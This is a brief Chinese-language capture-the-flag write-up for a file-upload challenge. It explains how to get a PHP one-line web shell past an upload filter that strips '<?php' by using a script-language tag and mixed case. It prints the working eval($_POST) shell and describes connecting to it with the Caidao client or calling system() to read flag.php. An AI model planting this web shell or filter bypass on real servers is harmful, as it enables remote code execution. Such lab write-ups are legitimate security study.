合天weekly_ctf 第八周
1.题目提示随便上传,还有一个flag的路径(/var/www/html/flag.php),传给一句话马吧
2.上传后访问,发现并未解析,<?php没了,应该是正则给过滤或者替换了
3.要想办法绕过他开头的过滤,发现脚本传一句话可以,但是还是发现php没了,测试后大小写可以绕过
一句话:
<script language="php">eval($_POST['a']);</script>
4.上传成功后直接菜刀连
5.其实不用菜刀也可以,post提交参数a,调用system函数去cat一下flag.php